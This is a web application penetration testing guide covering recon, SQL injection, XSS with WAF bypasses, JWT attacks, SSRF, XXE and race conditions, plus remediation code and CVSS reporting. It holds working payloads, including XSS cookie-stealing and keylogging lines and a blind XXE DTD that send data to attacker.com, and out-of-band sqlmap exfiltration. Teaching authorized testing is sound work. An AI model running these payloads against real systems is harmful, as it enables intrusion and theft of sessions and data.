Advanced Web Application Penetration Testing Methodology

The Evolution of Web Application Security

Web application security has changed substantially over the past decade. Early web attacks focused on simple SQL injection and cross-site scripting against monolithic applications. Today's attack surface is far broader: single-page applications, microservices architectures, API-first designs, WebSocket communications, and serverless functions each introduce their own vulnerability classes.

Modern pentesters must contend with sophisticated defenses like Web Application Firewalls (WAFs), Content Security Policies (CSP), and runtime application self-protection (RASP). But where defenses have grown, so have the techniques to bypass them. The cat-and-mouse game between attackers and defenders drives continuous innovation on both sides.

This guide walks through a professional-grade web application penetration testing methodology, from initial reconnaissance through exploitation and reporting.

Phase 1: Reconnaissance

Reconnaissance is the foundation of any successful pentest. The more you know about the target, the more precisely you can identify attack vectors.

Passive Reconnaissance (OSINT)

Passive recon gathers information without directly interacting with the target infrastructure:

# Subdomain enumeration using subfinder
subfinder -d target.com -all -silent | sort -u > subdomains.txt

# Historical URL discovery with Wayback Machine
echo "target.com" | waybackurls | grep -E '\.(php|asp|aspx|jsp|json|xml)' | sort -u > wayback_urls.txt

# Google dorking for sensitive files
# site:target.com filetype:pdf | filetype:doc | filetype:xlsx
# site:target.com inurl:admin | inurl:login | inurl:dashboard
# site:target.com ext:env | ext:log | ext:bak | ext:sql

# Certificate transparency log search
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u

# GitHub secret scanning
trufflehog github --org=target-org --only-verified
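
The certificate transparency output usually needs cleanup before it can be merged with the other sources: a single name_value field can hold several names separated by newlines, and wildcard entries are common. A minimal sketch of that normalization step, assuming the JSON shape returned by the crt.sh query above (hostnames_from_crtsh is a hypothetical helper, not part of any tool):

```python
import json


def hostnames_from_crtsh(json_text, root_domain):
    """Return sorted, unique hostnames under root_domain from crt.sh JSON output."""
    names = set()
    for entry in json.loads(json_text):
        # One certificate entry may list several names, one per line.
        for name in entry.get("name_value", "").splitlines():
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]  # drop the wildcard label
            # Keep only names that belong to the target domain.
            if name == root_domain or name.endswith("." + root_domain):
                names.add(name)
    return sorted(names)


if __name__ == "__main__":
    sample = json.dumps([
        {"name_value": "www.target.com\n*.dev.target.com"},
        {"name_value": "WWW.target.com"},
        {"name_value": "mail.other.org"},
    ])
    for host in hostnames_from_crtsh(sample, "target.com"):
        print(host)
```

Filtering on the root domain also keeps unrelated names that share a certificate out of the target list.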

Active Reconnaissance

Active recon involves direct interaction with the target to map the application surface:

# Technology fingerprinting
whatweb https://target.com -v

# Full port scan with service detection
nmap -sV -sC -p- --min-rate 5000 -oA full_scan target.com

# Directory and file brute-forcing
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt \
  -mc 200,301,302,403 -fc 404 -t 50 -o results.json -of json

# Virtual host discovery
ffuf -u https://target.com -H "Host: FUZZ.target.com" \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -fs 0 -mc 200
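
Brute-forcing output is easier to triage once it is grouped by status code. The sketch below assumes the results.json file written by the ffuf command above contains a top-level "results" list whose entries carry "status", "url", and "length" fields; verify that against the ffuf version in use. group_ffuf_results is a hypothetical helper.

```python
import json
from collections import defaultdict


def group_ffuf_results(json_text):
    """Group ffuf hits by HTTP status code as sorted (url, length) pairs."""
    grouped = defaultdict(list)
    for hit in json.loads(json_text).get("results", []):
        grouped[hit["status"]].append((hit["url"], hit["length"]))
    return {status: sorted(hits) for status, hits in sorted(grouped.items())}


if __name__ == "__main__":
    # Assumes results.json was produced with: -o results.json -of json
    with open("results.json", encoding="utf-8") as handle:
        for status, hits in group_ffuf_results(handle.read()).items():
            print(status, len(hits))
```

Many hits with an identical response length under one status code often point to a catch-all page rather than real content.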

Phase 2: OWASP Top 10 Deep Dive

A03:2021 — Injection (SQL Injection)

SQL injection remains one of the most devastating vulnerability classes. Modern techniques go far beyond simple ' OR 1=1 -- payloads.

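Common SQLi detection payloads:

# Boolean-based and UNION-based probes
' OR '1'='1
' UNION SELECT NULL--
# Error-based (Microsoft SQL Server): forces a type-conversion error that leaks the version string
' AND 1=CONVERT(int, @@version)--

# Time-based blind SQLi
# MySQL ("--" must be followed by whitespace, hence the "-- -" idiom)
' AND IF(1=1, SLEEP(5), 0)-- -
# Microsoft SQL Server
' WAITFOR DELAY '0:0:5'--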

Advanced exploitation with sqlmap:

# Automated SQLi exploitation
sqlmap -u "https://target.com/search?q=test" \
  --dbs \
  --level=5 \
  --risk=3 \
  --tamper=space2comment,between,randomcase \
  --random-agent \
  --batch

# Out-of-band data exfiltration
sqlmap -u "https://target.com/api/users?id=1" \
  --dns-domain=attacker-dns.com \
  --technique=T \
  --threads=1

Second-order SQL injection example:

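# A stored payload that fires later, when the application reuses the stored value
# Registration form input for the "username" field:
payload = "admin'-- "

# Nothing happens at registration if the INSERT is parameterized or escaped.
# The injection fires when a later feature (for example a profile lookup or
# password change) concatenates the stored username into a new query:
# SELECT * FROM users WHERE username = 'admin'-- '
# The trailing quote is commented out, so the query acts on the real
# "admin" row instead of the attacker's own account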
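
The mechanics are easier to see in a self-contained lab. The sketch below uses an in-memory SQLite database as a stand-in for the application's datastore; the table layout and the function names are hypothetical. Registration is parameterized and therefore safe, but a later password-change routine trusts the stored username and concatenates it into a new statement.

```python
import sqlite3


def make_db():
    """Create a throwaway database with a real admin and the attacker's account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Parameterized inserts: the payload is stored verbatim, nothing fires yet.
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "s3cret"), ("admin'-- ", "attacker-pw")],
    )
    return conn


def change_password_vulnerable(conn, stored_username, old_pw, new_pw):
    # Second-order flaw: a value read back from storage is treated as trusted.
    conn.execute(
        f"UPDATE users SET password = '{new_pw}' "
        f"WHERE username = '{stored_username}' AND password = '{old_pw}'"
    )


def change_password_safe(conn, stored_username, old_pw, new_pw):
    # Same logic with bound parameters: the stored value stays data.
    conn.execute(
        "UPDATE users SET password = ? WHERE username = ? AND password = ?",
        (new_pw, stored_username, old_pw),
    )


def password_of(conn, username):
    row = conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    change_password_vulnerable(conn, "admin'-- ", "attacker-pw", "pwned")
    print("admin password after vulnerable call:", password_of(conn, "admin"))
```

The takeaway for remediation is that data read back from the database needs the same parameterization as data arriving from the request.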

A03:2021 — Injection (Cross-Site Scripting)

XSS attacks have evolved significantly. Modern browsers and frameworks provide built-in protections, but bypass techniques are plentiful.

WAF Bypass Techniques:

<!-- Standard payload (usually blocked) -->
<script>alert('XSS')</script>

<!-- Case variation bypass -->
<ScRiPt>alert(document.domain)</ScRiPt>

<!-- Event handler bypass -->
<img src=x onerror="alert(1)">
<svg onload="alert(1)">
<body onpageshow="alert(1)">

<!-- Encoding bypass -->
<img src=x onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;(1)">

<!-- Client-side template injection (AngularJS-style expressions evaluated by the framework) -->
{{constructor.constructor('return alert(1)')()}}

<!-- DOM-based XSS via URL fragment -->
<a href="javascript:void(0)" id="test">Click</a>
<!-- If the app reads location.hash unsafely: -->
<!-- https://target.com/page#<img src=x onerror=alert(1)> -->

<!-- CSP bypass via JSONP endpoint -->
<script src="https://allowed-cdn.com/jsonp?callback=alert(1)//"></script>

Stealing cookies with XSS:

// Exfiltrating session tokens
fetch('https://attacker.com/steal?cookie=' + document.cookie);

// Keylogger injection
document.addEventListener('keypress', function(e) {
  fetch('https://attacker.com/log?key=' + e.key);
});
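
Every payload in this section depends on untrusted input reaching the page as markup or script. As a point of comparison for the report, here is a minimal sketch of output encoding for the HTML body context using Python's standard html.escape; render_welcome is a hypothetical helper, and other contexts (JavaScript, URLs, attributes without quotes) need their own encoders.

```python
import html


def render_welcome(username):
    """Build an HTML fragment with the untrusted value HTML-escaped."""
    # quote=True also escapes " and ', which matters inside quoted attributes.
    return f"<div>Welcome, {html.escape(username, quote=True)}</div>"


if __name__ == "__main__":
    print(render_welcome("<img src=x onerror=alert(1)>"))
```

With the angle brackets encoded, the browser renders the payload as text instead of parsing it as an element.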

A07:2021 — Identification and Authentication Failures (Broken Authentication)

Authentication flaws remain extremely common and high-impact:

# Brute-force login with ffuf
ffuf -u https://target.com/login \
  -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin&password=FUZZ" \
  -w /usr/share/seclists/Passwords/Common-Credentials/top-1000.txt \
  -fc 401 \
  -t 10

# JWT token manipulation
# Decode the JWT
echo "eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiam9obiIsInJvbGUiOiJ1c2VyIn0.xxx" | \
  cut -d'.' -f2 | base64 -d 2>/dev/null

# Algorithm confusion attack: change alg from RS256 to HS256
# Sign with the public key as HMAC secret
python3 jwt_tool.py <token> -X k -pk public.pem
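
JWT segments are base64url-encoded without padding, which is why a plain base64 decode can complain or truncate. A minimal sketch of decoding the header and claims without verifying the signature, plus the server-side check that defeats algorithm confusion (pinning the accepted algorithm). The function names and the RS256 default are assumptions for illustration.

```python
import base64
import json


def b64url_decode(segment):
    """Decode a base64url segment, restoring the padding JWTs strip off."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


def decode_jwt_unverified(token):
    """Return (header, payload) as dicts. The signature is NOT checked."""
    header_b64, payload_b64, _signature = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def algorithm_allowed(header, allowed=("RS256",)):
    """A verifier should pin the algorithm instead of trusting the token's alg."""
    return header.get("alg") in allowed


if __name__ == "__main__":
    token = "eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiam9obiIsInJvbGUiOiJ1c2VyIn0.xxx"
    header, payload = decode_jwt_unverified(token)
    print(header, payload, algorithm_allowed(header))
```

A verifier that rejects any token whose alg is outside its pinned list never reaches the point where a public key could be misused as an HMAC secret.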

Phase 3: Advanced Exploitation Techniques

Server-Side Request Forgery (SSRF)

SSRF allows an attacker to make the server initiate requests to internal resources:

# Basic SSRF to access cloud metadata
curl "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# SSRF with URL scheme bypass
# file:///etc/passwd
# gopher://internal-redis:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a
# dict://internal-server:11211/stats

# Bypass common SSRF filters
http://127.0.0.1 → http://0x7f000001
http://localhost → http://[::1]
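# Userinfo trick: everything before "@" is treated as credentials, so the
# request goes to the host after it. A filter that only checks that the URL
# starts with an allowed name (allowed.target.com is a placeholder) is fooled:
http://allowed.target.com@127.0.0.1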
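
These bypasses work against filters that compare strings instead of parsing the URL. A minimal sketch of the parsing a filter needs, using only the standard library; the helper names and the allowed.example host are hypothetical, and the check covers IP literals only, so hostnames would still need DNS resolution and re-validation at connection time.

```python
import ipaddress
from urllib.parse import urlsplit


def literal_ip(host):
    """Parse host as an IP literal, including hex or decimal integer forms."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        # Handles forms such as 0x7f000001 or 2130706433.
        return ipaddress.ip_address(int(host, 0))
    except (ValueError, TypeError):
        return None  # not an IP literal (a DNS name, or no host at all)


def is_internal_target(url):
    """True if the URL's real host is a loopback, private, or link-local literal."""
    host = urlsplit(url).hostname  # userinfo before "@" is excluded here
    ip = literal_ip(host)
    if ip is None:
        return host == "localhost"
    return ip.is_loopback or ip.is_private or ip.is_link_local


if __name__ == "__main__":
    for candidate in (
        "http://0x7f000001/",
        "http://[::1]/",
        "http://allowed.example@127.0.0.1/",
        "http://169.254.169.254/latest/meta-data/",
        "https://example.com/",
    ):
        print(candidate, is_internal_target(candidate))
```

When testing, a filter that rejects all of the internal forms above is at least parsing URLs properly; the next thing to probe is whether it re-checks the address after DNS resolution and redirects.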

XML External Entity (XXE) Injection

XXE exploits XML parsers that process external entity references:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&xxe;</productId>
</stockCheck>

<!-- Blind XXE with out-of-band data exfiltration -->
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>

<!-- evil.dtd hosted on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;
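
Both payloads depend on the parser accepting a DOCTYPE declaration. One common remediation is to reject any document that declares one before it reaches application code. The sketch below does this with the standard library's expat bindings; DTDForbidden and assert_no_dtd are hypothetical names, and production code would more typically rely on a hardened parser configuration or a dedicated library.

```python
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when an XML document contains a DOCTYPE declaration."""


def assert_no_dtd(xml_text):
    """Parse xml_text and raise DTDForbidden as soon as a DOCTYPE is seen."""
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    # expat calls this handler when it reaches "<!DOCTYPE ...".
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)


if __name__ == "__main__":
    payload = (
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        "<stockCheck><productId>&xxe;</productId></stockCheck>"
    )
    try:
        assert_no_dtd(payload)
    except DTDForbidden as exc:
        print("rejected:", exc)
```

Rejecting the DOCTYPE outright blocks both the in-band and the out-of-band variant, since neither can define an entity without it.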

Business Logic Vulnerabilities

Business logic flaws are often the most impactful and the hardest to find, because automated scanners have no model of what the application is supposed to do:

Price manipulation: Modify the price parameter in a purchase request from $100.00 to $0.01
Race conditions: Send concurrent transfer requests so that several pass the balance check before any debit is recorded, moving more money than the account holds
Workflow bypass: Skip mandatory steps like email verification by directly accessing post-verification endpoints
IDOR via predictable IDs: Access other users’ data by incrementing sequential resource identifiers

# Race condition exploit using concurrent requests
import asyncio
import aiohttp

async def transfer_funds(session, amount):
    async with session.post(
        'https://target.com/api/transfer',
        json={'to': 'attacker_account', 'amount': amount},
        headers={'Authorization': 'Bearer <token>'}
    ) as response:
        return await response.json()

async def exploit():
    async with aiohttp.ClientSession() as session:
        tasks = [transfer_funds(session, 1000) for _ in range(50)]
        results = await asyncio.gather(*tasks)
        print(f"Successful transfers: {sum(1 for r in results if r.get('status') == 'success')}")

asyncio.run(exploit())
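
The root cause behind this class of finding is a check-then-act sequence that is not atomic. For the remediation section of a report, here is a minimal in-process sketch of the fix, in which the balance check and the debit happen under one lock. The Account class is hypothetical; in a real application the equivalent is usually a database transaction with row locking or a single conditional UPDATE.

```python
import threading


class Account:
    def __init__(self, balance):
        self.balance = balance
        self._lock = threading.Lock()

    def withdraw(self, amount):
        """Check and debit atomically; return True if the withdrawal succeeded."""
        with self._lock:
            if self.balance >= amount:
                self.balance -= amount
                return True
            return False


def run_concurrent_withdrawals(account, amount, attempts):
    """Fire `attempts` withdrawals from separate threads; return the success count."""
    results = []

    def worker():
        results.append(account.withdraw(amount))

    threads = [threading.Thread(target=worker) for _ in range(attempts)]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    return sum(results)


if __name__ == "__main__":
    account = Account(1000)
    print("successful withdrawals:", run_concurrent_withdrawals(account, 1000, 50))
    print("final balance:", account.balance)
```

Retesting with the concurrent script after a fix like this should show exactly one successful transfer per available balance.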

Phase 4: Tools of the Trade

Burp Suite Professional Workflow

Burp Suite is the industry standard for web application testing. A typical workflow involves:

Proxy: Intercept and modify requests in real time
Scanner: Automated vulnerability scanning with manual verification
Intruder: Automated payload delivery for fuzzing and brute-forcing
Repeater: Manual request manipulation and response analysis
Collaborator: Out-of-band interaction detection for blind vulnerabilities

Automated Scanning with Nuclei

# Run nuclei with community templates
nuclei -u https://target.com -t cves/ -t vulnerabilities/ -t exposures/ \
  -severity critical,high -o nuclei_results.txt

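# Custom template for a specific check. Save as custom-check.yaml, then run:
#   nuclei -u https://target.com -t custom-check.yaml
id: custom-admin-panel
info:
  name: Admin Panel Detection
  author: pentest-team  # placeholder value; nuclei requires an author field
  severity: info
requests:  # newer nuclei releases name this key "http:"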
  - method: GET
    path:
      - "{{BaseURL}}/admin"
      - "{{BaseURL}}/administrator"
      - "{{BaseURL}}/wp-admin"
    matchers:
      - type: status
        status:
          - 200
          - 302

Phase 5: Professional Reporting

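A pentest is only as valuable as the report it produces. Each finding should include a severity rating backed by a CVSS vector, as in the example below, together with remediation guidance.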

CVSS v3.1 Scoring Example

Finding: Stored XSS in User Profile Bio
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CVSS Score: 5.4 (Medium)

Attack Vector (AV): Network — exploitable over the internet
Attack Complexity (AC): Low — no special conditions required
Privileges Required (PR): Low — attacker needs a valid account
User Interaction (UI): Required — victim must view the profile
Scope (S): Changed — impacts the victim's browser session
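
Scores are worth recomputing from the vector rather than copying from memory, since one metric change shifts the result. The sketch below follows the CVSS v3.1 base score equations and metric weights as published by FIRST; base_score and roundup are names chosen here, and only base metrics are handled (no temporal or environmental metrics).

```python
import math

CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
}
# Privileges Required is weighted differently when Scope is Changed.
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value):
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the CVSS v3.1 base score from a vector string."""
    parts = vector.split("/")
    if parts[0].startswith("CVSS:"):
        parts = parts[1:]  # drop the version prefix
    m = dict(part.split(":") for part in parts)

    changed = m["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = (
        8.22 * WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]] * pr * WEIGHTS["UI"][m["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


if __name__ == "__main__":
    print(base_score("CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"))
```

Changing PR from L to N in the same vector is a quick way to see how much a single metric moves the result.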

Remediation Guidance

Every finding should include actionable remediation steps:

# VULNERABLE: Direct string concatenation in SQL query
query = f"SELECT * FROM users WHERE username = '{user_input}'"

# SECURE: Parameterized query (%s is the placeholder style of drivers such as psycopg2; sqlite3 uses ?)
cursor.execute("SELECT * FROM users WHERE username = %s", (user_input,))

# SECURE: Using an ORM (SQLAlchemy)
user = session.query(User).filter(User.username == user_input).first()

# VULNERABLE: Rendering unsanitized user input
return f"<div>Welcome, {username}</div>"

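# SECURE: Using a template engine with auto-escaping (Flask with Jinja2)
return render_template("welcome.html", username=username)
# In the template: <div>Welcome, {{ username }}</div>
# Flask enables Jinja2 auto-escaping for .html templates; a standalone
# jinja2.Environment needs autoescape=True (or select_autoescape()) set explicitly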

Conclusion

Web application penetration testing is both an art and a science. Automated tools can identify low-hanging fruit, but the most critical vulnerabilities — business logic flaws, chained exploits, and novel attack vectors — require human creativity and deep technical understanding. Follow a structured methodology, document everything meticulously, and always test with proper authorization. The goal is not just to find vulnerabilities, but to help organizations build more resilient applications.